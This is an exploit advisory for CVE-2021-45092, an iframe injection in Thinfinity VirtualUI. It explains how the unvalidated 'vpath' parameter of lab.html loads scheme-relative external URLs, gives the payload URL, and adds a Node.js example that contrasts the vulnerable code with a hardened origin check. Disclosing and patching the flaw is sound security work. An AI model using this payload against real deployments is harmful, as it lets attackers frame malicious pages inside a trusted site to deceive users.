
Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
Version: Thinfinity VirtualUI < v3.0
Tested on: Microsoft Windows
CVE: CVE-2021-45092

How it works

The "vpath" query parameter of lab.html is used as the source of an iframe without being validated. A value that starts with "//" is a scheme-relative URL, so the browser resolves it against the page's own scheme and loads an arbitrary external origin inside the trusted VirtualUI page. By requesting the payload URL below an attacker can therefore frame any external website. The only restriction is that the external endpoint must allow itself to be framed: a target that sends X-Frame-Options or a Content-Security-Policy frame-ancestors directive will refuse to render inside the frame.

Payload

The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com", where "vpath=//" points at the external site to be iframed.

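The following is an added example and not Cybele Software's code: it models how a page like lab.html could turn the "vpath" parameter into an iframe src, and shows a hardened version next to it. The page URL, the function names and the query-string handling are assumptions for illustration; only the "vpath=//host" vector comes from the advisory. It runs under Node.js, which provides the same WHATWG URL parser a browser uses to resolve the frame source.

```javascript
// Added example, not Cybele Software's code. Models how a page such as
// lab.html could turn the "vpath" query parameter into an iframe src, and
// what a hardened version looks like. PAGE_URL, the function names and the
// query-string handling are assumptions; only the "vpath=//host" vector
// comes from the advisory. Runs under Node.js (WHATWG URL is built in).

const PAGE_URL = "https://example.com/lab.html"; // assumed vulnerable page

// Vulnerable pattern: the query value is used unchanged as the frame source.
// "//wikipedia.com" is scheme-relative, so it resolves against the page's
// scheme and yields an external origin (https://wikipedia.com/).
function vulnerableFrameSrc(pageUrl, vpath) {
  return new URL(vpath, pageUrl).href;
}

// Hardened pattern: accept only an absolute path on the page's own origin.
// Rejects scheme-relative ("//host"), absolute ("https://host") and
// backslash forms ("/\host", which browsers normalise to "//host"), then
// double-checks the resolved origin so any parser quirk still fails closed.
function safeFrameSrc(pageUrl, vpath) {
  if (typeof vpath !== "string" || !vpath.startsWith("/")) return null;
  if (vpath.startsWith("//") || vpath.includes("\\")) return null;
  const page = new URL(pageUrl);
  const resolved = new URL(vpath, page);
  if (resolved.origin !== page.origin) return null;
  return resolved.href;
}

// Pull "vpath" out of a full page URL the way location.search would supply it.
function vpathFromUrl(fullUrl) {
  return new URL(fullUrl).searchParams.get("vpath");
}

// Stand-alone demonstration with the advisory's vector.
if (typeof require !== "undefined" && require.main === module) {
  const attack = "https://example.com/lab.html?vpath=//wikipedia.com";
  const vpath = vpathFromUrl(attack);
  console.log("vulnerable:", vulnerableFrameSrc(PAGE_URL, vpath));
  console.log("hardened:  ", safeFrameSrc(PAGE_URL, vpath));
}
```

The origin comparison after resolution is the check that matters; the string prefix tests only give a clear error for the common cases. Whatever the page does with vpath, the fix is to resolve it against the page URL and refuse anything whose origin differs.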
Vulnerable versions

It has been tested in VirtualUI versions 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.

References

https://github.com/cybelesoft/virtualui/issues/2
https://www.tenable.com/cve/CVE-2021-45092
https://twitter.com/danielmofer